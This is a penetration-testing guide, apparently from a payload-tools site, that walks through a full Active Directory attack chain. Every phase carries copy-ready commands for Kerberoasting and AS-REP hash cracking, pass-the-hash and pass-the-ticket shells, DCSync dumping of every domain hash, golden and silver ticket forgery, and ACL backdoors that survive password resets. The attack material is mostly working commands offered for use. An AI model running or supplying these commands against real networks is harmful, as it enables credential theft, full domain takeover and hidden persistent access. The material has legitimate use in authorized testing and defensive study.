Active Directory Penetration Testing: Kerberoasting, AS-REP Roasting, and DCSync
Active Directory (AD) is the backbone of nearly every enterprise Windows environment, and it remains the most lucrative target during internal penetration tests. Compromising a single domain user credential often opens a path straight to Domain Admin. This guide walks through the full AD attack chain — from initial enumeration to domain dominance.
| Technique | Tool | Privilege Required | Severity | MITRE ATT&CK |
|---|---|---|---|---|
| Kerberoasting | Rubeus / impacket | Domain User | High | T1558.003 |
| AS-REP Roasting | Rubeus / GetNPUsers.py | None | High | T1558.004 |
| Pass the Hash | mimikatz / CrackMapExec | Local Admin | Critical | T1550.002 |
| DCSync | mimikatz | Domain Admin | Critical | T1003.006 |
| BloodHound Enumeration | BloodHound / SharpHound | Domain User | Medium | T1069 |
| Golden Ticket | mimikatz | Domain Admin + KRBTGT | Critical | T1558.001 |
| Silver Ticket | mimikatz | Service Hash | High | T1558.002 |
| LLMNR Poisoning | Responder | Network Access | High | T1557.001 |
Phase 1: Enumeration with BloodHound
Before attacking, you need a map. BloodHound ingests AD data and visualises attack paths to high-value targets. Collect data using SharpHound or the Python collector:
# Python collector (no agent on target required)
bloodhound-python -u lowpriv -p 'Password123' -d corp.local -c All --zip
# SharpHound on a domain-joined machine
.\SharpHound.exe -c All --zipfilename loot.zipOnce ingested, run the built-in query "Shortest Paths to Domain Admins" to find attack paths. Pay attention to GenericAll, WriteDACL, and ForceChangePassword edges — these are your escalation primitives.
Phase 2: Kerberoasting
Service accounts with SPNs can have their Kerberos tickets requested by any authenticated user. The ticket is encrypted with the service account's NTLM hash — crack it offline with hashcat.
# Request all servicePrincipalName tickets (impacket)
GetUserSPNs.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request -outputfile kerberoast.txt
# Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
# Targeted: request ticket for specific account
GetUserSPNs.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request-user svc_mssqlFocus on service accounts with adminCount=1 or members of privileged groups. Weak passwords on these accounts are extremely common in real engagements.
Phase 3: AS-REP Roasting
Accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH) expose their AS-REP hash to any unauthenticated attacker. No credentials required for initial spraying.
# No credentials needed — spray the whole domain
GetNPUsers.py corp.local/ -dc-ip 192.168.1.10 -usersfile users.txt -no-pass -format hashcat -outputfile asrep.txt
# Authenticated enumeration (finds affected accounts automatically)
GetNPUsers.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request -format hashcat
# Crack with hashcat (mode 18200 = Kerberos 5 AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txtPhase 4: Pass-the-Hash Lateral Movement
Once you have an NTLM hash — from credential dumping, responder captures, or Mimikatz — you can authenticate as that user without knowing the plaintext password.
# psexec — spawns SYSTEM shell via service creation
psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c corp.local/[email protected]
# wmiexec — semi-interactive, less noisy, no service creation
wmiexec.py -hashes :NTLMHASH corp.local/[email protected]
# smbexec — executes via SMB without dropping a binary
smbexec.py -hashes :NTLMHASH corp.local/[email protected]
# CrackMapExec spray across subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH --local-authPhase 5: Pass-the-Ticket
Kerberos tickets (TGT/TGS) can be exported and injected into another session, authenticating as the ticket owner without their password or hash.
# Export tickets from memory (Windows — requires admin/SYSTEM)
sekurlsa::tickets /export # Mimikatz
# Export and convert with impacket
ticketConverter.py ticket.ccache ticket.kirbi
# Inject ticket into current session (Linux)
export KRB5CCNAME=/path/to/ticket.ccache
klist # verify ticket loaded
wmiexec.py -k -no-pass corp.local/[email protected]Phase 6: DCSync — Dumping All Hashes
If you control an account with DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges (Domain Admins, Enterprise Admins, or ACL-granted accounts), you can simulate a Domain Controller replication and pull every hash in the domain.
# Dump all domain hashes via DCSync
secretsdump.py corp.local/Administrator:'Password123'@dc01.corp.local
# Dump only the krbtgt hash (needed for Golden Ticket)
secretsdump.py corp.local/Administrator:'Password123'@dc01.corp.local -just-dc-user krbtgt
# Via hash (PTH)
secretsdump.py -hashes :NTLMHASH corp.local/[email protected] -just-dc-ntlmPhase 7: Golden and Silver Tickets
With the krbtgt hash, you can forge arbitrary Kerberos TGTs valid for any user, including nonexistent ones. This is a Golden Ticket — your skeleton key to the domain.
# Golden Ticket (requires krbtgt hash + domain SID)
# Get domain SID
lookupsid.py corp.local/Administrator:'Password123'@dc01.corp.local | grep "Domain SID"
# Forge Golden Ticket with impacket
ticketer.py -nthash KRBTGT_NTLM -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain corp.local fakeadmin
# Silver Ticket — service-specific, harder to detect
# Use the service account hash instead of krbtgt
ticketer.py -nthash SVC_NTLM -domain-sid S-1-5-21-... -domain corp.local -spn cifs/dc01.corp.local AdministratorPhase 8: Persistence via ACL Backdoors
Rather than maintaining a malware foothold, backdoor AD itself by granting DCSync rights to a low-privilege account you control. This survives password resets and reboots.
# Grant DCSync rights to a compromised low-priv account (PowerView)
Add-ObjectACL -PrincipalIdentity lowpriv -Rights DCSync
# Add account to Domain Admins via AdminSDHolder
# (rights propagate every 60 minutes via SDProp)
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -PrincipalIdentity lowpriv -Rights AllTooling Reference
- impacket — GetUserSPNs, GetNPUsers, secretsdump, psexec, wmiexec, ticketer
- CrackMapExec / NetExec — SMB/WinRM/LDAP enumeration and lateral movement at scale
- Evil-WinRM — Full-featured WinRM shell:
evil-winrm -i 192.168.1.20 -u Administrator -H NTLMHASH - BloodHound + SharpHound — Attack path visualisation
- Mimikatz / pypykatz — In-memory credential extraction
- Rubeus — Kerberos abuse toolkit (Kerberoast, AS-REP, S4U2Self, ticket manipulation)
Use the Active Directory Generator to quickly build AD-specific payloads for your engagement. For lateral movement commands and post-exploitation chains, see our Lateral Movement Techniques guide. DNS enumeration of the domain is often the first step — the Recon Hub covers LDAP and DNS fingerprinting.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides